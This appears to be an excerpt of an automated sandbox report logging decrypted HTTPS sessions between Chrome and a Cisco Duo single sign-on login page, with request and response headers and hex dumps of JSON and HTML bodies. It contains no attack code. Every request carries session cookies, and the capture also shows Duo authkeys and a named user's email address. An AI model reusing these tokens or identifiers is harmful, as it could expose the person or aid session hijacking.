                                                                                                                                          Content-Type: application/json; charset=UTF-8
                                                                                                                                          Content-Length: 364
                                                                                                                                          Connection: close
                                                                                                                                          Server: Duo/1.0
                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                          X-Robots-Tag: noindex, nofollow
                                                                                                                                          Content-Security-Policy: default-src 'none'; style-src 'self'; script-src 'self'; font-src 'self'; frame-src 'self' ; frame-ancestors 'none'; img-src 'self' ; connect-src 'self'
                                                                                                                                          2024-11-18 05:49:00 UTC364INData Raw: 7b 22 73 74 61 74 22 3a 20 22 46 41 49 4c 22 2c 20 22 6d 65 73 73 61 67 65 22 3a 20 22 49 6e 76 61 6c 69 64 20 63 72 65 64 65 6e 74 69 61 6c 73 22 2c 20 22 61 75 74 68 6b 65 79 22 3a 20 22 41 53 4b 41 57 41 39 48 31 33 31 31 47 55 37 34 37 53 48 30 22 2c 20 22 61 69 64 22 3a 20 22 34 38 37 33 66 65 34 32 38 61 62 32 34 33 35 32 39 37 36 37 63 62 61 31 30 33 34 36 36 65 34 36 22 2c 20 22 73 63 69 64 22 3a 20 22 34 38 37 33 66 65 34 32 38 61 62 32 34 33 35 32 39 37 36 37 63 62 61 31 30 33 34 36 36 65 34 36 22 2c 20 22 72 65 64 69 72 65 63 74 5f 75 72 6c 22 3a 20 6e 75 6c 6c 2c 20 22 70 61 73 73 77 6f 72 64 5f 72 65 73 65 74 5f 6e 65 65 64 65 64 22 3a 20 66 61 6c 73 65 2c 20 22 70 61 73 73 77 6f 72 64 5f 63 68 61 6e 67 65 5f 72 65 71 75 65 73 74 65 64 22 3a
                                                                                                                                          Data Ascii: {"stat": "FAIL", "message": "Invalid credentials", "authkey": "ASKAWA9H1311GU747SH0", "aid": "4873fe428ab243529767cba103466e46", "scid": "4873fe428ab243529767cba103466e46", "redirect_url": null, "password_reset_needed": false, "password_change_requested":


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          84192.168.2.165294552.223.1.1634436248C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-18 05:49:01 UTC762OUTGET /login/ HTTP/1.1
                                                                                                                                          Host: cisco.login.duosecurity.com
                                                                                                                                          Connection: keep-alive
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          Cookie: _xsrf="YzBlNTVhNTg2YWM1NDYxNWIzODY2ZTFiNjJkNmU3MzY=|1731908894|26561626896dc0fda90d0e8e6f1cb08112326bcb"; sid="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|1d9f2bb659640aba9c2b6e69df3602e0ea9b8d2b"; sid-init-230486eb6dfc493f83dc10597f2cc7ad="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|e511b72b619248d3c4c5bdda4422eca533d718e4"; remembered-username=peter.smith%40cisco.com
                                                                                                                                          2024-11-18 05:49:01 UTC170INHTTP/1.1 400 Bad Request
                                                                                                                                          Date: Mon, 18 Nov 2024 05:49:01 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 1043
                                                                                                                                          Connection: close
                                                                                                                                          Server: Duo/1.0
                                                                                                                                          ETag: "672e588f-413"
                                                                                                                                          2024-11-18 05:49:01 UTC1043INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 20 20 20 20 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 63 6c 61 73 73 3d 22 69 65 20 69 65 38 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 39 5d 3e 20 20 20 20 20 20 20 20 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 63 6c 61 73 73 3d 22 69 65 20 69 65 39 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 39 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c
                                                                                                                                          Data Ascii: <!DOCTYPE html>...[if IE 8]> <html lang="en" class="ie ie8"> <![endif]-->...[if IE 9]> <html lang="en" class="ie ie9"> <![endif]-->...[if gt IE 9]>...> <html lang="en"> ...<![endif]--> <head> <meta charset="utf-8"> <titl


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          85192.168.2.165294635.71.186.1514436248C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-18 05:49:05 UTC1290OUTGET /email_first?authkey=ASKAWA9H1311GU747SH0&scid=4873fe428ab243529767cba103466e46&edit=True HTTP/1.1
                                                                                                                                          Host: cisco.login.duosecurity.com
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                                          Sec-Fetch-User: ?1
                                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                                          Referer: https://cisco.login.duosecurity.com/login/?authkey=AS25IRIE37M5OV09AEPH&scid=4873fe428ab243529767cba103466e46
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          Cookie: _xsrf="YzBlNTVhNTg2YWM1NDYxNWIzODY2ZTFiNjJkNmU3MzY=|1731908894|26561626896dc0fda90d0e8e6f1cb08112326bcb"; sid="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|1d9f2bb659640aba9c2b6e69df3602e0ea9b8d2b"; sid-init-230486eb6dfc493f83dc10597f2cc7ad="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|e511b72b619248d3c4c5bdda4422eca533d718e4"; remembered-username=peter.smith%40cisco.com
                                                                                                                                          2024-11-18 05:49:05 UTC1812INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 18 Nov 2024 05:49:05 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Content-Length: 1929
                                                                                                                                          Connection: close
                                                                                                                                          Server: Duo/1.0
                                                                                                                                          X-Duo-Endpoint-Health-Appserver-Url: https://127.0.0.1:53100 https://127.0.0.1:53101 https://127.0.0.1:53102 https://127.0.0.1:53103 https://127.0.0.1:53104 https://127.0.0.1:53105 https://127.0.0.1:63100 https://127.0.0.1:63101 http://127.0.0.1:53106 http://127.0.0.1:53107 http://127.0.0.1:53108 http://127.0.0.1:53109 http://127.0.0.1:53110 http://127.0.0.1:53111 https://localhost:53100 https://localhost:53101 https://localhost:53102 https://localhost:53103 https://localhost:53104 https://localhost:53105 https://localhost:63100 https://localhost:63101
                                                                                                                                          X-Duo-Endpoint-Health-Uri: com-duosecurity-devicehealth://*
                                                                                                                                          X-S3-Assets: ux-asset-commercial.duosecurity.com
                                                                                                                                          Etag: "e9ad3807d9a1fb50caacc5745d49fb137a142412"
                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                          X-Robots-Tag: noindex, nofollow
                                                                                                                                          Content-Security-Policy: default-src 'none'; style-src 'self'; script-src 'self'; font-src 'self'; frame-src 'self' com-duosecurity-devicehealth://*; frame-ancestors 'none'; img-src 'self' ux-asset-commercial.duosecurity.com; connect-src 'self' https://127.0.0.1:53100 https://127.0.0.1:53101 https://127.0.0.1:53102 https://127.0.0.1:53103 https://127.0.0.1:53104 https://127.0.0.1:53105 https://127.0.0.1:63100 https://127.0.0.1:63101 http://127.0.0.1:53106 http://127.0.0.1:53107 http://127.0.0.1:53108 http://127.0.0.1:53109 http://127.0.0.1:53110 http://127.0.0.1:53111 https://localhost:53100 https://localhost:53101 https://localhost:53102 https://localhost:53103 https://localhost:53104 https://localhost:53105 https://localhost:63100 https://localhost:63101
                                                                                                                                          2024-11-18 05:49:05 UTC1929INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 4c 6f 67 69 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74
                                                                                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Login</title><meta charset="utf-8" /><meta name="viewport" content="width=device-widt


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          86192.168.2.165294735.71.186.1514436248C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-18 05:49:05 UTC1168OUTGET /static/css/page/email-first.css?v=8132c HTTP/1.1
                                                                                                                                          Host: cisco.login.duosecurity.com
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                          Sec-Fetch-Dest: style
                                                                                                                                          Referer: https://cisco.login.duosecurity.com/email_first?authkey=ASKAWA9H1311GU747SH0&scid=4873fe428ab243529767cba103466e46&edit=True
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          Cookie: _xsrf="YzBlNTVhNTg2YWM1NDYxNWIzODY2ZTFiNjJkNmU3MzY=|1731908894|26561626896dc0fda90d0e8e6f1cb08112326bcb"; sid="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|1d9f2bb659640aba9c2b6e69df3602e0ea9b8d2b"; sid-init-230486eb6dfc493f83dc10597f2cc7ad="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|e511b72b619248d3c4c5bdda4422eca533d718e4"; remembered-username=peter.smith%40cisco.com
                                                                                                                                          If-None-Match: "672e588f-102e9"
                                                                                                                                          If-Modified-Since: Fri, 08 Nov 2024 18:29:35 GMT
                                                                                                                                          2024-11-18 05:49:05 UTC554INHTTP/1.1 304 Not Modified
                                                                                                                                          Date: Mon, 18 Nov 2024 05:49:05 GMT
                                                                                                                                          Connection: close
                                                                                                                                          Server: Duo/1.0
                                                                                                                                          Last-Modified: Fri, 08 Nov 2024 18:29:35 GMT
                                                                                                                                          ETag: "672e588f-102e9"
                                                                                                                                          Cache-Control: private, no-cache
                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                          X-Robots-Tag: noindex, nofollow
                                                                                                                                          Content-Security-Policy: default-src 'none'; style-src 'self'; script-src 'self'; font-src 'self'; frame-src 'self' ; frame-ancestors 'none'; img-src 'self' ; connect-src 'self'


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          87192.168.2.165294835.71.186.1514436248C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-18 05:49:06 UTC1161OUTGET /static/shared/lib/jquery/jquery.min.js?v=ff152 HTTP/1.1
                                                                                                                                          Host: cisco.login.duosecurity.com
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          If-None-Match: "672e588f-15d9d"
                                                                                                                                          If-Modified-Since: Fri, 08 Nov 2024 18:29:35 GMT
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                          Referer: https://cisco.login.duosecurity.com/email_first?authkey=ASKAWA9H1311GU747SH0&scid=4873fe428ab243529767cba103466e46&edit=True
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          Cookie: _xsrf="YzBlNTVhNTg2YWM1NDYxNWIzODY2ZTFiNjJkNmU3MzY=|1731908894|26561626896dc0fda90d0e8e6f1cb08112326bcb"; sid="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|1d9f2bb659640aba9c2b6e69df3602e0ea9b8d2b"; sid-init-230486eb6dfc493f83dc10597f2cc7ad="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|e511b72b619248d3c4c5bdda4422eca533d718e4"; remembered-username=peter.smith%40cisco.com
                                                                                                                                          2024-11-18 05:49:06 UTC554INHTTP/1.1 304 Not Modified
                                                                                                                                          Date: Mon, 18 Nov 2024 05:49:06 GMT
                                                                                                                                          Connection: close
                                                                                                                                          Server: Duo/1.0
                                                                                                                                          Last-Modified: Fri, 08 Nov 2024 18:29:35 GMT
                                                                                                                                          ETag: "672e588f-15d9d"
                                                                                                                                          Cache-Control: private, no-cache
                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                          X-Robots-Tag: noindex, nofollow
                                                                                                                                          Content-Security-Policy: default-src 'none'; style-src 'self'; script-src 'self'; font-src 'self'; frame-src 'self' ; frame-ancestors 'none'; img-src 'self' ; connect-src 'self'


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          88192.168.2.165294935.71.186.1514436248C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-18 05:49:06 UTC1152OUTGET /static/js/page/email-first.js?v=488d0 HTTP/1.1
                                                                                                                                          Host: cisco.login.duosecurity.com
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          If-None-Match: "672e588f-fbd4d"
                                                                                                                                          If-Modified-Since: Fri, 08 Nov 2024 18:29:35 GMT
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                          Referer: https://cisco.login.duosecurity.com/email_first?authkey=ASKAWA9H1311GU747SH0&scid=4873fe428ab243529767cba103466e46&edit=True
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          Cookie: _xsrf="YzBlNTVhNTg2YWM1NDYxNWIzODY2ZTFiNjJkNmU3MzY=|1731908894|26561626896dc0fda90d0e8e6f1cb08112326bcb"; sid="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|1d9f2bb659640aba9c2b6e69df3602e0ea9b8d2b"; sid-init-230486eb6dfc493f83dc10597f2cc7ad="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|e511b72b619248d3c4c5bdda4422eca533d718e4"; remembered-username=peter.smith%40cisco.com
                                                                                                                                          2024-11-18 05:49:06 UTC554INHTTP/1.1 304 Not Modified
                                                                                                                                          Date: Mon, 18 Nov 2024 05:49:06 GMT
                                                                                                                                          Connection: close
                                                                                                                                          Server: Duo/1.0
                                                                                                                                          Last-Modified: Fri, 08 Nov 2024 18:29:35 GMT
                                                                                                                                          ETag: "672e588f-fbd4d"
                                                                                                                                          Cache-Control: private, no-cache
                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                          X-Robots-Tag: noindex, nofollow
                                                                                                                                          Content-Security-Policy: default-src 'none'; style-src 'self'; script-src 'self'; font-src 'self'; frame-src 'self' ; frame-ancestors 'none'; img-src 'self' ; connect-src 'self'


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          89192.168.2.165295035.71.186.1514436248C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-18 05:49:15 UTC1224OUTPOST /email_first HTTP/1.1
                                                                                                                                          Host: cisco.login.duosecurity.com
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Content-Length: 208
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          Accept: text/plain, */*; q=0.01
                                                                                                                                          Content-Type: application/x-www-form-urlencoded; charset=UTF-8
                                                                                                                                          X-Requested-With: XMLHttpRequest
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Origin: https://cisco.login.duosecurity.com
                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          Referer: https://cisco.login.duosecurity.com/email_first?authkey=ASKAWA9H1311GU747SH0&scid=4873fe428ab243529767cba103466e46&edit=True
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          Cookie: _xsrf="YzBlNTVhNTg2YWM1NDYxNWIzODY2ZTFiNjJkNmU3MzY=|1731908894|26561626896dc0fda90d0e8e6f1cb08112326bcb"; sid="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|1d9f2bb659640aba9c2b6e69df3602e0ea9b8d2b"; sid-init-230486eb6dfc493f83dc10597f2cc7ad="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|e511b72b619248d3c4c5bdda4422eca533d718e4"; remembered-username=peter.smith%40cisco.com
                                                                                                                                          2024-11-18 05:49:15 UTC208OUTData Raw: 61 75 74 68 6b 65 79 3d 41 53 4a 51 35 41 41 48 50 35 5a 55 37 44 4b 36 53 57 34 57 26 73 63 69 64 3d 34 38 37 33 66 65 34 32 38 61 62 32 34 33 35 32 39 37 36 37 63 62 61 31 30 33 34 36 36 65 34 36 26 72 65 71 2d 74 72 61 63 65 2d 67 72 6f 75 70 3d 35 31 36 39 33 61 66 64 64 63 64 38 32 35 30 31 65 62 31 37 64 36 38 31 26 75 73 65 72 6e 61 6d 65 3d 70 65 74 65 72 2e 73 6d 69 74 68 25 34 30 63 69 73 63 6f 2e 63 6f 6d 26 73 73 6f 2d 75 73 65 72 6e 61 6d 65 2d 69 6e 2d 64 75 6f 2d 64 65 73 6b 74 6f 70 3d 26 5f 78 73 72 66 3d 63 30 65 35 35 61 35 38 36 61 63 35 34 36 31 35 62 33 38 36 36 65 31 62 36 32 64 36 65 37 33 36
                                                                                                                                          Data Ascii: authkey=ASJQ5AAHP5ZU7DK6SW4W&scid=4873fe428ab243529767cba103466e46&req-trace-group=51693afddcd82501eb17d681&username=peter.smith%40cisco.com&sso-username-in-duo-desktop=&_xsrf=c0e55a586ac54615b3866e1b62d6e736
                                                                                                                                          2024-11-18 05:49:15 UTC508INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 18 Nov 2024 05:49:15 GMT
                                                                                                                                          Content-Type: application/json; charset=UTF-8
                                                                                                                                          Content-Length: 273
                                                                                                                                          Connection: close
                                                                                                                                          Server: Duo/1.0
                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                          X-Robots-Tag: noindex, nofollow
                                                                                                                                          Content-Security-Policy: default-src 'none'; style-src 'self'; script-src 'self'; font-src 'self'; frame-src 'self' ; frame-ancestors 'none'; img-src 'self' ; connect-src 'self'
                                                                                                                                          2024-11-18 05:49:15 UTC273INData Raw: 7b 22 61 69 64 22 3a 20 22 34 38 37 33 66 65 34 32 38 61 62 32 34 33 35 32 39 37 36 37 63 62 61 31 30 33 34 36 36 65 34 36 22 2c 20 22 61 75 74 68 6b 65 79 22 3a 20 22 41 53 34 4d 55 43 44 4f 36 55 5a 38 49 56 32 58 53 51 42 44 22 2c 20 22 6d 65 73 73 61 67 65 22 3a 20 6e 75 6c 6c 2c 20 22 72 65 64 69 72 65 63 74 5f 75 72 6c 22 3a 20 22 2f 6c 6f 67 69 6e 2f 3f 61 75 74 68 6b 65 79 3d 41 53 34 4d 55 43 44 4f 36 55 5a 38 49 56 32 58 53 51 42 44 26 73 63 69 64 3d 34 38 37 33 66 65 34 32 38 61 62 32 34 33 35 32 39 37 36 37 63 62 61 31 30 33 34 36 36 65 34 36 22 2c 20 22 73 63 69 64 22 3a 20 22 34 38 37 33 66 65 34 32 38 61 62 32 34 33 35 32 39 37 36 37 63 62 61 31 30 33 34 36 36 65 34 36 22 2c 20 22 64 75 6f 5f 64 65 73 6b 74 6f 70 5f 64 61 74 61 22 3a 20 6e
                                                                                                                                          Data Ascii: {"aid": "4873fe428ab243529767cba103466e46", "authkey": "AS4MUCDO6UZ8IV2XSQBD", "message": null, "redirect_url": "/login/?authkey=AS4MUCDO6UZ8IV2XSQBD&scid=4873fe428ab243529767cba103466e46", "scid": "4873fe428ab243529767cba103466e46", "duo_desktop_data": n


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          90192.168.2.165295152.223.1.1634436248C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-18 05:49:16 UTC767OUTGET /email_first HTTP/1.1
                                                                                                                                          Host: cisco.login.duosecurity.com
                                                                                                                                          Connection: keep-alive
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          Cookie: _xsrf="YzBlNTVhNTg2YWM1NDYxNWIzODY2ZTFiNjJkNmU3MzY=|1731908894|26561626896dc0fda90d0e8e6f1cb08112326bcb"; sid="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|1d9f2bb659640aba9c2b6e69df3602e0ea9b8d2b"; sid-init-230486eb6dfc493f83dc10597f2cc7ad="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|e511b72b619248d3c4c5bdda4422eca533d718e4"; remembered-username=peter.smith%40cisco.com
                                                                                                                                          2024-11-18 05:49:16 UTC170INHTTP/1.1 400 Bad Request
                                                                                                                                          Date: Mon, 18 Nov 2024 05:49:16 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 1043
                                                                                                                                          Connection: close
                                                                                                                                          Server: Duo/1.0
                                                                                                                                          ETag: "672e588f-413"
                                                                                                                                          2024-11-18 05:49:16 UTC1043INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 20 20 20 20 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 63 6c 61 73 73 3d 22 69 65 20 69 65 38 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 39 5d 3e 20 20 20 20 20 20 20 20 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 63 6c 61 73 73 3d 22 69 65 20 69 65 39 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 39 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c
                                                                                                                                          Data Ascii: <!DOCTYPE html>...[if IE 8]> <html lang="en" class="ie ie8"> <![endif]-->...[if IE 9]> <html lang="en" class="ie ie9"> <![endif]-->...[if gt IE 9]>...> <html lang="en"> ...<![endif]--> <head> <meta charset="utf-8"> <titl


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          91192.168.2.165295235.71.186.1514436248C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-18 05:49:16 UTC1290OUTGET /login/?authkey=AS4MUCDO6UZ8IV2XSQBD&scid=4873fe428ab243529767cba103466e46 HTTP/1.1
                                                                                                                                          Host: cisco.login.duosecurity.com
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Upgrade-Insecure-Requests: 1
